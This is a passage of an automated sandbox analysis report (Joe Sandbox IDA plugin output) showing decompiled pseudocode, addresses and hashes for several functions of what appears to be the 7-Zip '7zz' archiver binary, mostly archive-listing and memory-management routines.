							_t208 = _t208 + 1;
							_t228 = _t208 -  *((intOrPtr*)(_t218 - 0x80));
						} while (_t208 <  *((intOrPtr*)(_t218 - 0x80)));
					}
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E004102DF(_t218 - 0xc4, _t228);
					if( *((intOrPtr*)(_t218 - 0x30)) == _t168) {
						 *(_t218 + 8) = "there is no such archive";
						E0046B8F4(_t218 + 8, 0x47cf70);
					}
					E00405B9F(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					_t209 = 0;
					 *(_t218 - 4) = 6;
					if( *((intOrPtr*)(_t218 - 0x30)) > _t168) {
						do {
							 *(_t218 - 0x18) = _t168;
							 *(_t218 - 0x14) = _t168;
							 *(_t218 - 0x10) = _t168;
							E00401E9A(_t218 - 0x18, 3);
							 *(_t218 - 4) = 7;
							E0040A5AF();
							_push(_t218 - 0x18);
							E00406796(_t218 - 0x60);
							 *(_t218 - 4) = 6;
							E00407A18( *(_t218 - 0x18));
							_t209 = _t209 + 1;
						} while (_t209 <  *((intOrPtr*)(_t218 - 0x30)));
					}
					E00404AD0(_t218 - 0x4c, 4);
					 *((intOrPtr*)(_t218 - 0x4c)) = 0x47a668;
					 *(_t218 - 4) = 8;
					E004195A6(_t218 - 0x60, _t218 - 0x4c);
					E0040867E( *((intOrPtr*)(_t218 - 0x24)),  *((intOrPtr*)(_t218 - 0x44)));
					E0040867E( *(_t218 + 8),  *((intOrPtr*)(_t218 - 0x44)));
					if( *((intOrPtr*)(_t218 - 0x44)) > _t168) {
						do {
							_t212 =  *( *((intOrPtr*)(_t218 - 0x40)) + _t168 * 4) << 2;
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x2c)))));
							E00406796( *((intOrPtr*)(_t218 - 0x24)));
							_push( *((intOrPtr*)(_t212 +  *((intOrPtr*)(_t218 - 0x54)))));
							E00406796( *(_t218 + 8));
							_t168 = _t168 + 1;
						} while (_t168 <  *((intOrPtr*)(_t218 - 0x44)));
					}
					 *(_t218 - 4) = 6;
					E00408604(_t218 - 0x4c);
					 *((intOrPtr*)(_t218 - 0x60)) = 0x47a420;
					 *(_t218 - 4) = 9;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) & 0x00000000;
					E00408604(_t218 - 0x60);
					 *((intOrPtr*)(_t218 - 0x38)) = 0x47a420;
					 *(_t218 - 4) = 0xa;
					E0040862D();
					 *(_t218 - 4) =  *(_t218 - 4) | 0xffffffff;
					_t142 = E00408604(_t218 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t218 - 0xc));
					return _t142;
				}
			}













                                                                      0x00410043
                                                                      0x00410053
                                                                      0x00410059
                                                                      0x00410063
                                                                      0x00410066
                                                                      0x0041006e
                                                                      0x00410071
                                                                      0x00410079
                                                                      0x0041007d
                                                                      0x00410082
                                                                      0x0041008a
                                                                      0x0041008e
                                                                      0x00410093
                                                                      0x004100a3
                                                                      0x004100a7
                                                                      0x004100a8
                                                                      0x004100a9
                                                                      0x004100ab
                                                                      0x004100af
                                                                      0x004100b6
                                                                      0x00410281
                                                                      0x00410288
                                                                      0x0041028d
                                                                      0x0041028e
                                                                      0x00410292
                                                                      0x00410294
                                                                      0x0041029a
                                                                      0x0041029d
                                                                      0x004102a0
                                                                      0x004102a3
                                                                      0x004102a6
                                                                      0x004102ac
                                                                      0x004102af
                                                                      0x004102b2
                                                                      0x004102b5
                                                                      0x004102b8
                                                                      0x004102bb
                                                                      0x004102be
                                                                      0x004102c1
                                                                      0x004102c4
                                                                      0x004102c7
                                                                      0x004102ca
                                                                      0x004102cd
                                                                      0x004102d0
                                                                      0x004102d3
                                                                      0x004102d6
                                                                      0x004102de
                                                                      0x004100c5
                                                                      0x004100c8
                                                                      0x004100cc
                                                                      0x004100d1
                                                                      0x004100d7
                                                                      0x004100db
                                                                      0x004100e3
                                                                      0x004100e7
                                                                      0x004100ec
                                                                      0x004100f1
                                                                      0x004100f3
                                                                      0x00410101
                                                                      0x00410113
                                                                      0x00410117
                                                                      0x0041011b
                                                                      0x00410120
                                                                      0x00410127
                                                                      0x0041012c
                                                                      0x0041012d
                                                                      0x0041012e
                                                                      0x0041012e
                                                                      0x004100f3
                                                                      0x00410133
                                                                      0x0041013d
                                                                      0x00410145
                                                                      0x00410150
                                                                      0x00410157
                                                                      0x00410157
                                                                      0x0041015f
                                                                      0x00410164
                                                                      0x00410167
                                                                      0x0041016c
                                                                      0x00410170
                                                                      0x00410172
                                                                      0x00410177
                                                                      0x0041017a
                                                                      0x0041017d
                                                                      0x00410180
                                                                      0x0041018b
                                                                      0x00410196
                                                                      0x004101a1
                                                                      0x004101a2
                                                                      0x004101a7
                                                                      0x004101ae
                                                                      0x004101b3
                                                                      0x004101b5
                                                                      0x00410172
                                                                      0x004101bf
                                                                      0x004101c4
                                                                      0x004101d1
                                                                      0x004101d5
                                                                      0x004101e0
                                                                      0x004101eb
                                                                      0x004101f3
                                                                      0x004101f5
                                                                      0x00410203
                                                                      0x00410206
                                                                      0x00410209
                                                                      0x00410214
                                                                      0x00410217
                                                                      0x0041021c
                                                                      0x0041021d
                                                                      0x004101f5
                                                                      0x00410225
                                                                      0x00410229
                                                                      0x0041022e
                                                                      0x00410234
                                                                      0x00410238
                                                                      0x0041023d
                                                                      0x00410244
                                                                      0x00410249
                                                                      0x0041024f
                                                                      0x00410256
                                                                      0x0041025b
                                                                      0x00410262
                                                                      0x0041026d
                                                                      0x00410275
                                                                      0x00410275

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00410043
                                                                        • Part of subcall function 00415349: __EH_prolog.LIBCMT ref: 0041534E
                                                                        • Part of subcall function 00406796: __EH_prolog.LIBCMT ref: 0040679B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: 59@
                                                                      • API String ID: 3519838083-2780377667
                                                                      • Opcode ID: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
                                                                      • Instruction ID: a6bdb68d8052a433f7f109985f49a34908dcb5d84b45f2bdbde216e6b6000813
                                                                      • Opcode Fuzzy Hash: 62da0f27e3cacdeb6fde7cd36ca36bc92bb1d3e930a35b93c99b7167f577b6c6
                                                                      • Instruction Fuzzy Hash: AD914EB0C00258DFCB14EF9AC985ADDBBB5BF54308F1181AEE109B7292DB785A44CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0041721B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 97%
                                                                      			E0041721B(void* __ecx, void* __eflags) {
				void* __edi;
				void* _t66;
				signed int _t77;
				void* _t86;
				void* _t88;
				signed int _t115;
				void* _t120;

				E0046B890(E00474C34, _t120);
				_t86 = __ecx;
				E00405B9F(_t120 - 0x38);
				 *((intOrPtr*)(_t120 - 0x38)) = 0x47a420;
				_t115 = 0;
				 *(_t120 - 4) = 0;
				E00405B9F(_t120 - 0x4c);
				 *((intOrPtr*)(_t120 - 0x4c)) = 0x47a420;
				_t126 =  *((intOrPtr*)(_t120 + 8));
				 *(_t120 - 4) = 1;
				if( *((intOrPtr*)(_t120 + 8)) != 0) {
					E00403532(_t120 - 0x18,  *((intOrPtr*)(_t120 + 8))); // executed
					 *(_t120 - 4) = 2;
					E00417377(_t120 - 0x18, _t120 - 0x38, _t126);
					 *(_t120 - 4) = 1;
					E00407A18( *(_t120 - 0x18));
				}
				_t127 =  *((intOrPtr*)(_t120 + 0xc)) - _t115;
				if( *((intOrPtr*)(_t120 + 0xc)) != _t115) {
					E00403532(_t120 - 0x18,  *((intOrPtr*)(_t120 + 0xc)));
					 *(_t120 - 4) = 3;
					E00417377(_t120 - 0x18, _t120 - 0x4c, _t127);
					 *(_t120 - 4) = 1;
					E00407A18( *(_t120 - 0x18));
				}
				if( *((intOrPtr*)(_t120 - 0x30)) <= 0) {
					L10:
					 *((intOrPtr*)(_t120 - 0x4c)) = 0x47a420;
					 *(_t120 - 4) = 6;
					E0040862D();
					 *(_t120 - 4) =  *(_t120 - 4) & 0x00000000;
					E00408604(_t120 - 0x4c);
					 *((intOrPtr*)(_t120 - 0x38)) = 0x47a420;
					 *(_t120 - 4) = 7;
					E0040862D();
					 *(_t120 - 4) =  *(_t120 - 4) | 0xffffffff;
					_t66 = E00408604(_t120 - 0x38);
					 *[fs:0x0] =  *((intOrPtr*)(_t120 - 0xc));
					return _t66;
				} else {
					_t88 = _t86 + 0x18;
					do {
						E0040351A(_t120 - 0x24);
						 *(_t120 - 4) = 4;
						E0040351A(_t120 - 0x18);
						 *(_t120 - 4) = 5;
						E00401E26(_t120 - 0x24,  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x2c)) + _t115 * 4)));
						if(_t115 <  *((intOrPtr*)(_t120 - 0x44))) {
							E00401E26(_t120 - 0x18,  *((intOrPtr*)( *((intOrPtr*)(_t120 - 0x40)) + _t115 * 4)));
							_t77 = E00408053( *(_t120 - 0x18), 0x48bb7c);
							if(_t77 == 0) {
								 *(_t120 - 0x14) =  *(_t120 - 0x14) & _t77;
								 *( *(_t120 - 0x18)) =  *( *(_t120 - 0x18)) & 0x00000000;
							}
						}
						_push(_t120 - 0x24);
						E00417791(_t88, _t115);
						 *(_t120 - 4) = 1;
						E00407A18( *(_t120 - 0x18));
						E00407A18( *((intOrPtr*)(_t120 - 0x24)));
						_t115 = _t115 + 1;
					} while (_t115 <  *((intOrPtr*)(_t120 - 0x30)));
					goto L10;
				}
			}










                                                                      0x00417220
                                                                      0x00417229
                                                                      0x00417230
                                                                      0x0041723a
                                                                      0x0041723d
                                                                      0x00417242
                                                                      0x00417245
                                                                      0x0041724a
                                                                      0x0041724d
                                                                      0x00417250
                                                                      0x00417254
                                                                      0x0041725c
                                                                      0x00417267
                                                                      0x0041726b
                                                                      0x00417273
                                                                      0x00417277
                                                                      0x0041727c
                                                                      0x0041727d
                                                                      0x00417280
                                                                      0x00417288
                                                                      0x00417293
                                                                      0x00417297
                                                                      0x0041729f
                                                                      0x004172a3
                                                                      0x004172a8
                                                                      0x004172ad
                                                                      0x0041732d
                                                                      0x0041732d
                                                                      0x00417333
                                                                      0x00417337
                                                                      0x0041733c
                                                                      0x00417343
                                                                      0x00417348
                                                                      0x0041734e
                                                                      0x00417355
                                                                      0x0041735a
                                                                      0x00417361
                                                                      0x0041736c
                                                                      0x00417374
                                                                      0x004172af
                                                                      0x004172af
                                                                      0x004172b2
                                                                      0x004172b5
                                                                      0x004172bd
                                                                      0x004172c1
                                                                      0x004172cc
                                                                      0x004172d3
                                                                      0x004172db
                                                                      0x004172e6
                                                                      0x004172f3
                                                                      0x004172fa
                                                                      0x004172fc
                                                                      0x00417302
                                                                      0x00417302
                                                                      0x004172fa
                                                                      0x0041730b
                                                                      0x0041730c
                                                                      0x00417314
                                                                      0x00417318
                                                                      0x00417320
                                                                      0x00417325
                                                                      0x0041732a
                                                                      0x00000000
                                                                      0x004172b2

                                                                      APIs
                                                                      • __EH_prolog.LIBCMT ref: 00417220
                                                                        • Part of subcall function 00417377: __EH_prolog.LIBCMT ref: 0041737C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: 59@
                                                                      • API String ID: 3519838083-2780377667
                                                                      • Opcode ID: 5004501c2401821115a51ffef3e39df9269668dc0aafc01eff95271498320234
                                                                      • Instruction ID: 873c80215d370b6b671446c0e79e2b2cb706c6381e77b2058a47ab1539bbaff3
                                                                      • Opcode Fuzzy Hash: 5004501c2401821115a51ffef3e39df9269668dc0aafc01eff95271498320234
                                                                      • Instruction Fuzzy Hash: C6416D71C0414DEECF05EFA5D546AEDBFB0AF54318F10806EE80173292DB386A85DBA5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040C83C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E0040C83C(intOrPtr __ecx, intOrPtr __edx) {
				intOrPtr _t26;
				void* _t31;
				void* _t32;
				intOrPtr _t42;
				intOrPtr* _t45;
				signed int _t50;
				void* _t58;
				intOrPtr* _t59;
				void* _t60;

				E0046B890(0x473e52, _t60);
				_push(__ecx);
				_push(__ecx);
				_t26 =  *0x490be0; // 0x12
				 *((intOrPtr*)(_t60 - 0x14)) = __edx;
				_t50 = 0;
				 *((intOrPtr*)(_t60 - 0x10)) = __ecx;
				if(_t26 <= 0) {
					L17:
					if( *((intOrPtr*)(_t60 + 0x18)) != 0) {
						_t53 =  *((intOrPtr*)(_t60 - 0x10));
						if( *( *((intOrPtr*)(_t60 - 0x10))) != 0) {
							_push(0x78);
							_t42 = E004079F2();
							 *((intOrPtr*)(_t60 + 0x14)) = _t42;
							 *(_t60 - 4) = 0;
							if(_t42 == 0) {
								_t58 = 0;
							} else {
								_t31 = E0040D550(_t42); // executed
								_t58 = _t31;
							}
							 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
							E0040C9B4( *((intOrPtr*)(_t60 - 0x14)), _t58);
							_t22 = _t58 + 0x74; // 0x74
							E0040C9B4(_t22,  *_t53);
						}
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
					return 0;
				} else {
					_t45 = 0x490ae0;
					do {
						_t59 =  *_t45;
						if( *((intOrPtr*)(_t59 + 8)) ==  *((intOrPtr*)(_t60 + 8)) &&  *((intOrPtr*)(_t59 + 0xc)) ==  *((intOrPtr*)(_t60 + 0xc))) {
							if( *((intOrPtr*)(_t60 + 0x14)) == 0) {
								if( *_t59 != 0) {
									_t32 =  *_t59();
									L11:
									if( *((intOrPtr*)(_t59 + 0x18)) == 0) {
										_push(_t32);
										if( *((intOrPtr*)(_t59 + 0x14)) != 1) {
											E0040C9B4( *((intOrPtr*)(_t60 + 0x10)));
										} else {
											E0040C9B4( *((intOrPtr*)(_t60 - 0x14)));
										}
									} else {
										E0040C9B4( *((intOrPtr*)(_t60 - 0x10)), _t32);
									}
									goto L17;
								}
								goto L8;
							}
							if( *((intOrPtr*)(_t59 + 4)) != 0) {
								_t32 =  *((intOrPtr*)(_t59 + 4))();
								goto L11;
							} else {
								goto L8;
							}
						}
						L8:
						_t50 = _t50 + 1;
						_t45 = _t45 + 4;
					} while (_t50 < _t26);
					goto L17;
				}
			}












                                                                      0x0040c841
                                                                      0x0040c846
                                                                      0x0040c847
                                                                      0x0040c848
                                                                      0x0040c84e
                                                                      0x0040c853
                                                                      0x0040c859
                                                                      0x0040c85c
                                                                      0x0040c8bf
                                                                      0x0040c8c2
                                                                      0x0040c8c4
                                                                      0x0040c8c9
                                                                      0x0040c8cb
                                                                      0x0040c8d3
                                                                      0x0040c8d5
                                                                      0x0040c8da
                                                                      0x0040c8dd
                                                                      0x0040c8e8
                                                                      0x0040c8df
                                                                      0x0040c8df
                                                                      0x0040c8e4
                                                                      0x0040c8e4
                                                                      0x0040c8ed
                                                                      0x0040c8f2
                                                                      0x0040c8f9
                                                                      0x0040c8fc
                                                                      0x0040c8fc
                                                                      0x0040c8c9
                                                                      0x0040c909
                                                                      0x0040c911
                                                                      0x0040c85e
                                                                      0x0040c85e
                                                                      0x0040c863
                                                                      0x0040c863
                                                                      0x0040c86b
                                                                      0x0040c878
                                                                      0x0040c883
                                                                      0x0040c8b3
                                                                      0x0040c892
                                                                      0x0040c895
                                                                      0x0040c8a6
                                                                      0x0040c8a7
                                                                      0x0040c8ba
                                                                      0x0040c8a9
                                                                      0x0040c8ac
                                                                      0x0040c8ac
                                                                      0x0040c897
                                                                      0x0040c89b
                                                                      0x0040c89b
                                                                      0x00000000
                                                                      0x0040c895
                                                                      0x00000000
                                                                      0x0040c883
                                                                      0x0040c87d
                                                                      0x0040c88f
                                                                      0x00000000
                                                                      0x0040c87f
                                                                      0x00000000
                                                                      0x0040c87f
                                                                      0x0040c87d
                                                                      0x0040c885
                                                                      0x0040c885
                                                                      0x0040c886
                                                                      0x0040c889
                                                                      0x00000000
                                                                      0x0040c88d

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: I
                                                                      • API String ID: 3519838083-299795746
                                                                      • Opcode ID: 459aedaa02336b51509d93332a302b4edd80c34f2b1668e4d39c44968d6b4148
                                                                      • Instruction ID: 7b3e389aea170d28871fe4c7e7a7ec955f419ab3ca2688fab4717e103c8f7ea0
                                                                      • Opcode Fuzzy Hash: 459aedaa02336b51509d93332a302b4edd80c34f2b1668e4d39c44968d6b4148
                                                                      • Instruction Fuzzy Hash: F8218C72904245DBDB24FFA589C046EB7A2AB40305B24863FE152B76C1CB38AD45D79E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00415349 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 94%
                                                                      			E00415349(intOrPtr __ecx, intOrPtr __edx) {
				void* _t40;
				signed int _t41;
				signed int _t42;
				void* _t43;
				intOrPtr _t50;
				intOrPtr _t64;
				void* _t65;
				void* _t69;

				_t50 = __ecx;
				E0046B890(E00474820, _t69);
				 *((intOrPtr*)(_t69 - 0x14)) = __edx;
				 *((intOrPtr*)(_t69 - 0x18)) = __ecx;
				 *(_t69 - 0x10) = 0;
				if( *((intOrPtr*)(__ecx + 8)) <= 0) {
					L8:
					E004152E1( *((intOrPtr*)(_t69 - 0x14)));
					_t40 = 0;
				} else {
					while(1) {
						_t41 =  *(_t50 + 0xc);
						_t64 =  *((intOrPtr*)(_t41 +  *(_t69 - 0x10) * 4));
						if( *((intOrPtr*)(_t64 + 4)) != 0) {
							_push(_t64);
							_push(0xffffffff);
							_t42 = E00415303( *((intOrPtr*)(_t69 - 0x14)), _t69, __eflags, 0xffffffff);
						} else {
							_t42 = _t41 | 0xffffffff;
						}
						 *((intOrPtr*)(_t69 - 0x28)) = 0;
						 *((intOrPtr*)(_t69 - 0x24)) = 0;
						 *((intOrPtr*)(_t69 - 0x20)) = 0;
						 *((intOrPtr*)(_t69 - 0x1c)) = 4;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 0;
						_t23 = _t64 + 0xc; // 0xc, executed
						_t43 = E00415420(_t23, _t42, 0xffffffff, _t64, _t69 - 0x2c,  *((intOrPtr*)(_t69 - 0x14)), 0,  *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 0x10))); // executed
						_t65 = _t43;
						 *((intOrPtr*)(_t69 - 0x2c)) = 0x47a420;
						 *(_t69 - 4) = 1;
						E0040862D();
						 *(_t69 - 4) =  *(_t69 - 4) | 0xffffffff;
						E00408604(_t69 - 0x2c);
						if(_t65 != 0) {
							break;
						}
						 *(_t69 - 0x10) =  *(_t69 - 0x10) + 1;
						if( *(_t69 - 0x10) <  *((intOrPtr*)( *((intOrPtr*)(_t69 - 0x18)) + 8))) {
							_t50 =  *((intOrPtr*)(_t69 - 0x18));
							continue;
						} else {
							goto L8;
						}
						goto L9;
					}
					_t40 = _t65;
				}
				L9:
				 *[fs:0x0] =  *((intOrPtr*)(_t69 - 0xc));
				return _t40;
			}











                                                                      0x00415349
                                                                      0x0041534e
                                                                      0x0041535e
                                                                      0x00415361
                                                                      0x00415364
                                                                      0x00415367
                                                                      0x00415401
                                                                      0x00415404
                                                                      0x00415409
                                                                      0x0041536d
                                                                      0x00415377
                                                                      0x00415377
                                                                      0x0041537d
                                                                      0x00415383
                                                                      0x0041538d
                                                                      0x0041538e
                                                                      0x00415392
                                                                      0x00415385
                                                                      0x00415385
                                                                      0x00415385
                                                                      0x00415397
                                                                      0x0041539a
                                                                      0x0041539d
                                                                      0x004153a0
                                                                      0x004153a7
                                                                      0x004153b2
                                                                      0x004153c3
                                                                      0x004153c6
                                                                      0x004153cb
                                                                      0x004153cd
                                                                      0x004153d3
                                                                      0x004153da
                                                                      0x004153df
                                                                      0x004153e6
                                                                      0x004153ed
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004153ef
                                                                      0x004153fb
                                                                      0x00415374
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004153fb
                                                                      0x0041541c
                                                                      0x0041541c
                                                                      0x0041540b
                                                                      0x00415411
                                                                      0x00415419

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: 59@
                                                                      • API String ID: 3519838083-2780377667
                                                                      • Opcode ID: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
                                                                      • Instruction ID: 7eef16f8fbdbee1da98b56e57a5457bfcb84ef35117a6ae98f398b0350cb022f
                                                                      • Opcode Fuzzy Hash: 151458e0659461347c1d03a06ddd24b008cc591c285c689024c003f5389a7c67
                                                                      • Instruction Fuzzy Hash: E62128B1D00519DFCB04DF99C8819EEFB71FB88368F20822EE52567290D7755981CF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040B431 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0040B431(intOrPtr* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				signed int _t24;
				void* _t53;

				E0046B890(0x473d9c, _t53);
				_t47 =  *(_t53 + 8);
				if(E0040B669( *(_t53 + 8)) == 0) {
					_t15 = _t53 + 8;
					 *_t15 =  *(_t53 + 8) | 0xffffffff;
					__eflags =  *_t15;
					 *(_t53 - 4) = 1;
					_t24 = E0040B174(_t53 + 8, _t47,  *_t15, _t47, __ecx); // executed
					_t34 = _t24;
					E0040B154(_t53 + 8);
				} else {
					E0040B414(__ecx);
					 *(_t53 - 0x1c) =  *(_t53 - 0x1c) | 0xffffffff;
					 *((char*)(__ecx + 0x24)) = 1;
					_t34 = 0;
					 *(_t53 - 4) = 0;
					if(L0040BC4A(_t47) != 0) {
						E00403593(__ecx + 0x28, _t47 + 8);
						if( *((intOrPtr*)(_t53 - 0x17)) != 0) {
							 *__ecx =  *((intOrPtr*)(_t53 - 0x14));
							 *((intOrPtr*)(__ecx + 4)) =  *((intOrPtr*)(_t53 - 0x10));
						}
						_t34 = 1;
					}
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E0040B87D(_t53 - 0x1c);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
				return _t34;
			}






                                                                      0x0040b436
                                                                      0x0040b441
                                                                      0x0040b44f
                                                                      0x0040b49e
                                                                      0x0040b49e
                                                                      0x0040b49e
                                                                      0x0040b4a7
                                                                      0x0040b4ae
                                                                      0x0040b4b6
                                                                      0x0040b4b8
                                                                      0x0040b451
                                                                      0x0040b453
                                                                      0x0040b458
                                                                      0x0040b45c
                                                                      0x0040b460
                                                                      0x0040b466
                                                                      0x0040b470
                                                                      0x0040b479
                                                                      0x0040b481
                                                                      0x0040b486
                                                                      0x0040b48b
                                                                      0x0040b48b
                                                                      0x0040b48e
                                                                      0x0040b48e
                                                                      0x0040b490
                                                                      0x0040b497
                                                                      0x0040b497
                                                                      0x0040b4c5
                                                                      0x0040b4cd

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: 59@
                                                                      • API String ID: 3519838083-2780377667
                                                                      • Opcode ID: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
                                                                      • Instruction ID: 8a2df7c348f84777b7ad1a159669c3b3579df71dbce98e58b468e3cdb01b9464
                                                                      • Opcode Fuzzy Hash: cb7b4bd2c4af9b8fe15fa2cdcbd2e201475b04ce8f4a32cc0f81032e162c00ed
